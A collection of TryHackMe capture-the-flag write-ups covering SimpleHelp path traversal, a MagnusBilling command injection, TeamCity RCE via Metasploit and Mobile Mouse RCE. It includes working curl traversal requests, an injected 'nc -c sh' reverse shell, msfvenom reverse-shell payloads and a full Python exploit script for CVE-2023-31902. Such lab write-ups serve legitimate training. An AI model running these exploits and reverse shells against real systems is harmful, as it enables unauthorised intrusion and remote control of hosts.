Try Hack Me Write-ups

Solutions to some Try Hack Me

Try Hack Me/SimpleHelp

Write-up / THM / SimpleHelp: CVE-2024-57727 

by: alfreddgreat

image.png

Get the python script for POC for the vulnerability in https://github.com/imjdl/CVE-2024-57727.

root@ip-10-10-65-98:~# git clone https://github.com/imjdl/CVE-2024-57727

Change directory to the downloaded CVE folder.

root@ip-10-10-65-98:~/CVE-2024-57727# cd CVE-2024-57727/

Run the following python script.

root@ip-10-10-65-98:~/CVE-2024-57727# python3 poc.py http://10.10.32.37

image.png

Check the poc.py script

def send_path_traversal_request(url: str) -> bool:    """    Send a path traversal request and get the response        Args:        url (str): Target url address    Returns:        dict: Dictionary containing response information, including status code, response content, etc.        None: Returns None if request fails    """    url = url + "/toolbox-resource/../resource1/../../configuration/serverconfig.xml"    context = ssl._create_unverified_context()    # Default request headers    default_headers = {        'Accept-Encoding': 'gzip, deflate, br',        'Accept': '*/*',        'Connection': 'keep-alive'    }

root@ip-10-10-65-98:~/CVE-2024-57727# curl --path-as-is http://10.10.32.37/toolbox-resource/../resource1/../../configuration/serverconfig.xml

image.png

root@ip-10-10-65-98:~/CVE-2024-57727# curl --path-as-is http://10.10.32.37/toolbox-resource/../resource1/../../configuration/flag.txt

root@ip-10-10-65-98:~/CVE-2024-57727# curl --path-as-is http://10.10.32.37/toolbox-resource/../resource1/../../configuration/flag.txt

THM{9ND23PVA}

"Choose your path wisely, but your shoes comfortably."

"Traverse lightly, laugh loudly."

THM{9ND23PVA}

 

root@ip-10-10-65-98:~/CVE-2024-57727# curl --path-as-is http://10.10.189.219/toolbox-resource/../secmsg/../../configuration/flag.txt

root@ip-10-10-65-98:~/CVE-2024-57727# curl --path-as-is http://10.10.189.219/toolbox-resource/../secmsg/../../configuration/flag.txt

THM{X8733EEZ}


"Some paths are meant to be traversed; others just lead to a 404."

THM{X8733EEZ}

 

 

 

 

Try Hack Me/Billing

Write-up / THM / Billing

by:

image.png


Start the Virtual Machine

Run an nmap scan to the VM machine

image.png

From the nmap scan:  nmap -sS -sC -sV IP_THM_VM_machine

Ports 22, 80, and 3306 are open

VM machine is a Debian Linux

Connect to port 80 using a web browser

image.png

image.png

nc -c sh 10.10.209.29 9001

10.10.233.21/mbilling/lib/icepay/icepay.php?democ=/dev/null; nc -c sh 10.10.209.29 9001

listen with nc

nc -lnvp 9001

python -c 'import os; os.system("/bin/sh")'

https://www.linkedin.com/pulse/linux-privesc-fail2ban-exploit-ahnaf-abrar-hasin/

https://eldstal.se/advisories/230327-magnusbilling.html

../ advisories/

Security advisory

A command injection vulnerability exists in magnusbilling versions 6 and 7. The vulnerability allows an unauthenticated user to execute arbitrary OS commands on the host, with the privileges of the web server.

Affected products

magnusbilling 7 up to and including commit 7af21ed620

magnusbilling 6 (all versions)

Steps to reproduce

The following proof of concept uses a harmless sleep 30 command as a payload.

  1. Visit /mbilling/lib/icepay/icepay.php?democ=/dev/null;sleep%2030;ls%20a
  2. Observe that the page takes 30 seconds to load
  3. Visit /mbilling/lib/icepay/icepay.php?democ=/dev/null;sleep%203;ls%20a
  4. Observe that the page takes only 3 seconds to load

Cause

A piece of demonstration code is present in lib/icepay/icepay.php, with a call to exec() at line 753. The parameter to exec() includes the GET parameter democ, which is controlled by the user.

Impact

An unauthenticated user is able to execute arbitrary OS commands. The commands run with the privileges of the web server process, typically www-data. At a minimum, this allows an attacker to compromise the billing system and its database.

Proposed Mitigation

Remove the demo code from icepay.php.

History

Try Hack Me/Brains

Write-up / THM / Brains

by: alfreddgreat

brains.webp

image.png

Start the Virtual Machine

Run an nmap scan to the VM machine

image.png

From the nmap scan:  nmap -sS -sC -sV IP_THM_VM_machine

Ports 22, 80, and 50000 are open

VM machine is an Ubuntu Linux

Connect to port 80 using a web browser

image.png

In the result of the nmap, port 50000 is also open and observing the result it is an http server

50000/tcp open  ibm-db2?
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.1 401 
|     TeamCity-Node-Id: MAIN_SERVER
|     WWW-Authenticate: Basic realm="TeamCity"
|     WWW-Authenticate: Bearer realm="TeamCity"
|     Cache-Control: no-store
|     Content-Type: text/plain;charset=UTF-8
|     Date: Fri, 18 Oct 2024 01:48:03 GMT
|     Connection: close
|     Authentication required
|     login manually go to "/login.html" page
|   drda, ibm-db2, ibm-db2-das: 
|     HTTP/1.1 400 
|     Content-Type: text/html;charset=utf-8
|     Content-Language: en
|     Content-Length: 435
|     Date: Fri, 18 Oct 2024 01:48:03 GMT
|     Connection: close
|     <!doctype html><html lang="en"><head><title>HTTP Status 400 
|     Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400 

TeamCity-Node-Id: MAIN_SERVER

Connect to port 50000 using the web browser

image.png

The webserver has an application of Teamcity Version 2023.11.3 (build 147512)

Search the vulnerability of the Teamcity version 2023.11.3 in internet.

https://blog.jetbrains.com/teamcity/2024/03/additional-critical-security-issues-affecting-teamcity-on-premises-cve-2024-27198-and-cve-2024-27199-update-to-2023-11-4-now/

image.png

The application Teamcity has a vulnerability of remote code execution (RCE)

Check if the Teamcity vulnerability exist in the Metasploit Framework CVE-2024-27198 and CVE-2024-27199

Run msfconsole

image.png

Modules 3, 4, 5, 6, 7 and 8 can be used for the CVE-2024-27198 but we don't know if the application in in java, windows, linux or unix.

Detect the techniligy being used by the webserver using banner grabbing and we can use WAPPALYZER

image.png

In the wappalyzer you can observe that the Web Servers there is Apache Tomcat which means the application is running in JAVA.

Therefore in the msfconsole, we will use module 4 which is target: Java

In the msfconsole:   msf6 > use 4

image.png

Then run options to see what is needed in the exploit. The column Required with the yes are obligatory.

msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > options

image.png

The fields RHOSTS, RPORT should be filled up. And the LHOST should be the IP that can be reached by the VM Machine. Since the machine is in a VPN, the LHOST will be the VPN IP assigned to the Kali machine.

Set the following values

msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > set RHOSTS 10.10.170.24

msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > set RPORT 50000

msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > set LHOST 10.11.80.68

Note: 10.10.170.24 is the THM-VM-Machine, 50000 is the Teamcity application port and 10.11.80.68 is the VPN IP of the Kali.

image.png

Now check if the options are set successfully. Run the options command to see the set values.

msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > options

image.png

Now we can run the exploit

msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > run -j

image.png

If the prompt will not come out, press enter until the following comes out.

image.png

Then we run the sessions to see the session created

Meterpreter session 1 opened (10.11.80.68:4444 -> 10.10.170.24:54368) at 2024-10-17 22:38:00 -0400

msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > sessions

image.png

There is 1 session created and connected to the target machine (THM-VM-machine).

Connect to the session with the command sessions 1

msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > sessions 1

image.png

Now we are inside the machine with the meterpreter shell. We can walk through using the meterpreter commands or by running the command shell.

meterpreter > shell

image.png

Now we are in the target shell command. To have a prompt run a shell like the following

/bin/bash -i

image.png

Now we are inside the VM machine in the directory /opt/teamcity/TeamCity/bin

The question to answer in tryhackme.com is the following

image.png

The needed flag is in the /home directory where a user exists.

Change directory to /home directory to see who is the user:  ubuntu@brains:/opt/teamcity/TeamCity/bin$  cd /home and then list the content of the directory with the ls command,

image.png

The user is ubuntu.

Change directory to the user directory and get the content of the flag.txt file.

ubuntu@brains:/home$ cd ubuntu

ubuntu@brains:/home$ ls -l

ubuntu@brains:/home$ cat flag.txt

image.png

FLAG: THM{faa9bac345709b6620a6200b484c7594}

image.png

image.png

Connect to the machine 10.10.74.225 with port 8000 using a browser.

image.png

Try Hack Me/Mouse Trap

Try Hack Me / Mouse Trap

by: alfreddgreat

image.png

image.png

image.png

image.png

root@ip-10-10-123-135:~# nmap -sS -sC -sV 10.10.162.0

root@ip-10-10-123-135:~# nmap -sS -sC -sV -O 10.10.162.0
Starting Nmap 7.80 ( https://nmap.org ) at 2025-03-30 22:19 BST
Nmap scan report for 10.10.162.0
Host is up (0.00035s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: MOUSETRAP
|   NetBIOS_Domain_Name: MOUSETRAP
|   NetBIOS_Computer_Name: MOUSETRAP
|   DNS_Domain_Name: MOUSETRAP
|   DNS_Computer_Name: MOUSETRAP
|   Product_Version: 10.0.17763
|_  System_Time: 2025-03-30T21:22:42+00:00
| ssl-cert: Subject: commonName=MOUSETRAP
| Not valid before: 2024-12-08T13:53:36
|_Not valid after:  2025-06-09T13:53:36
|_ssl-date: 2025-03-30T21:23:10+00:00; 0s from scanner time.
9099/tcp open  unknown
| fingerprint-strings: 
|   FourOhFourRequest, GetRequest: 
|     HTTP/1.0 200 OK 
|     Server: Mobile Mouse Server 
|     Content-Type: text/html 
|     Content-Length: 326
|_    <HTML><HEAD><TITLE>Success!</TITLE><meta name="viewport" content="width=device-width,user-scalable=no" /></HEAD><BODY BGCOLOR=#000000><br><br><p style="font:12pt arial,geneva,sans-serif; text-align:center; color:green; font-weight:bold;" >The server running on "MOUSETRAP" was able to receive your request.</p></BODY></HTML>
9999/tcp open  abyss?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9099-TCP:V=7.80%I=7%D=3/30%Time=67E9B591%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,1A7,"HTTP/1\.0\x20200\x20OK\x20\r\nServer:\x20Mobile\x20Mouse\
SF:x20Server\x20\r\nContent-Type:\x20text/html\x20\r\nContent-Length:\x203
SF:26\r\n\r\n<HTML><HEAD><TITLE>Success!</TITLE><meta\x20name=\"viewport\"
SF:\x20content=\"width=device-width,user-scalable=no\"\x20/></HEAD><BODY\x
SF:20BGCOLOR=#000000><br><br><p\x20style=\"font:12pt\x20arial,geneva,sans-
SF:serif;\x20text-align:center;\x20color:green;\x20font-weight:bold;\"\x20
SF:>The\x20server\x20running\x20on\x20\"MOUSETRAP\"\x20was\x20able\x20to\x
SF:20receive\x20your\x20request\.</p></BODY></HTML>\r\n")%r(FourOhFourRequ
SF:est,1A7,"HTTP/1\.0\x20200\x20OK\x20\r\nServer:\x20Mobile\x20Mouse\x20Se
SF:rver\x20\r\nContent-Type:\x20text/html\x20\r\nContent-Length:\x20326\r\
SF:n\r\n<HTML><HEAD><TITLE>Success!</TITLE><meta\x20name=\"viewport\"\x20c
SF:ontent=\"width=device-width,user-scalable=no\"\x20/></HEAD><BODY\x20BGC
SF:OLOR=#000000><br><br><p\x20style=\"font:12pt\x20arial,geneva,sans-serif
SF:;\x20text-align:center;\x20color:green;\x20font-weight:bold;\"\x20>The\
SF:x20server\x20running\x20on\x20\"MOUSETRAP\"\x20was\x20able\x20to\x20rec
SF:eive\x20your\x20request\.</p></BODY></HTML>\r\n");
MAC Address: 02:23:36:E3:FF:87 (Unknown)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=3/30%OT=135%CT=1%CU=37501%PV=Y%DS=1%DC=D%G=Y%M=022336%
OS:TM=67E9B63F%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=10B%TI=I%CI=I%II=
OS:I%SS=S%TS=U)OPS(O1=M5B4NW8NNS%O2=M5B4NW8NNS%O3=M5B4NW8%O4=M5B4NW8NNS%O5=
OS:M5B4NW8NNS%O6=M5B4NNS)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF7
OS:0)ECN(R=Y%DF=Y%T=80%W=FFFF%O=M5B4NW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S
OS:+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%
OS:T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=
OS:0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%
OS:S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(
OS:R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=
OS:N%T=80%CD=Z)

Network Distance: 1 hop
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_nbstat: NetBIOS name: MOUSETRAP, NetBIOS user: <unknown>, NetBIOS MAC: 02:23:36:e3:ff:87 (unknown)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2025-03-30T21:22:42
|_  start_date: N/A

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 212.34 seconds

root@ip-10-10-123-135:~# nmap --script vuln 10.10.162.0

root@ip-10-10-123-135:~# nmap --script vuln 10.10.162.0
Starting Nmap 7.80 ( https://nmap.org ) at 2025-03-30 22:04 BST
Nmap scan report for 10.10.162.0
Host is up (0.00025s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
139/tcp  open  netbios-ssn
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
445/tcp  open  microsoft-ds
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
3389/tcp open  ms-wbt-server
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown: 
9099/tcp open  unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
9999/tcp open  abyss
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
MAC Address: 02:23:36:E3:FF:87 (Unknown)

Host script results:
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR

Nmap done: 1 IP address (1 host up) scanned in 59.82 seconds

Using port 9099 in the browser

image.png

In the first port, version scan we see that there is a Mobile Mouse Server

Search for an exploit in the internet and the following from github appears

https://github.com/blue0x1/mobilemouse-exploit?tab=readme-ov-file

image.png

image.png

Using the V2 version: CVE-2023-31902-v2.py

# Exploit Title: Mobile Mouse 3.6.0.4 Remote Code Execution v2 
# Date: Apr 28, 2023
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://mobilemouse.com/
# Software Link: https://www.mobilemouse.com/downloads/setup.exe
# Version: 3.6.0.4
# Tested on: Windows 10 Enterprise LTSC Build 17763

#!/usr/bin/env python3

import socket
from time import sleep
import argparse
import threading
from impacket import smbserver

def smb_server(lhost, file_to_serve):
    server = smbserver.SimpleSMBServer(listenAddress=lhost, listenPort=445)
    server.addShare("share", ".", "")
    server.start()

help = " Mobile Mouse 3.6.0.4 Remote Code Execution "
parser = argparse.ArgumentParser(description=help)
parser.add_argument("--target", help="Target IP", required=True)
parser.add_argument("--file", help="File name to Upload", required=True)
parser.add_argument("--lhost", help="Your local IP", default="127.0.0.1")

args = parser.parse_args()

host = args.target
command_shell = args.file
lhost = args.lhost
port = 9099 # Default port

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, 256)
s.connect((host, port))


smb_server_thread = threading.Thread(target=smb_server, args=(lhost, command_shell))
smb_server_thread.start()

CONN = bytearray.fromhex("434F4E4E4543541E1E63686F6B726968616D6D6564691E6950686F6E651E321E321E04")
s.send(CONN)
run = s.recv(54)

RUN = bytearray.fromhex("4b45591e3131341e721e4f505404")
s.send(RUN)
run = s.recv(54)

sleep(0.5)

payload = f"cmd.exe /c start /B \\\\{lhost}\\share\\{command_shell}".encode('utf-8')
hex_payload = payload.hex()
SHELL = bytearray.fromhex("4B45591E3130301E" + hex_payload + "1E04" + "4b45591e2d311e454e5445521e04")
s.send(SHELL)
shell = s.recv(96)

print("Take The rose...")

sleep(30)
s.close()

Save the file to a mousemobile.py using the code above

Now create an executable remote shell execution using the msfvenom.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exe

msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP_LOCAL_MACHINE LPORT=PORT_LOCAL -f exe > shell-x64.exe

image.png

Using the mousemobile.py and using the shell-x64.exe as the code to be executed.

Take note that shell-x64.exe has been created using port 446

First open a terminal and run the following command

nc -lnvp 446

image.png

Leave it open and open another terminal and now we will exploit the mouse application using the python script.

python3 mousemobile.py --target 10.10.162.0 --lhost 10.10.123.135 --file shell-x64.exe

image.png

Now with the first terminal where netcat is opened, it should have connected.

image.png

Now we have a windows terminal opened.

image.png

image.png

Get the flag in the user.txt

image.png

THM{Terry_mouse_2_rce}

Exploiting the Unquoted Path

Search the unquoted path of a service using the command below.

Using shapup.exe

C:\Users\purpletom>SharpUp.exe audit
SharpUp.exe audit

=== SharpUp: Running Privilege Escalation Checks ===
[!] Modifialbe scheduled tasks were not evaluated due to permissions.

=== Services with Unquoted Paths ===
	Service 'Mobile Mouse Service' (StartMode: Manual) has executable 'C:\Program Files (x86)\Mobile Mouse\Mouse Utilities\HelperService.exe', but 'C:\Program' is modifable.
	Service 'Mobile Mouse Service' (StartMode: Manual) has executable 'C:\Program Files (x86)\Mobile Mouse\Mouse Utilities\HelperService.exe', but 'C:\Program Files' is modifable.
	Service 'Mobile Mouse Service' (StartMode: Manual) has executable 'C:\Program Files (x86)\Mobile Mouse\Mouse Utilities\HelperService.exe', but 'C:\Program Files (x86)\Mobile Mouse\Mouse' is modifable.

'C:\Program Files (x86)\Mobile Mouse\Mouse' is modifable.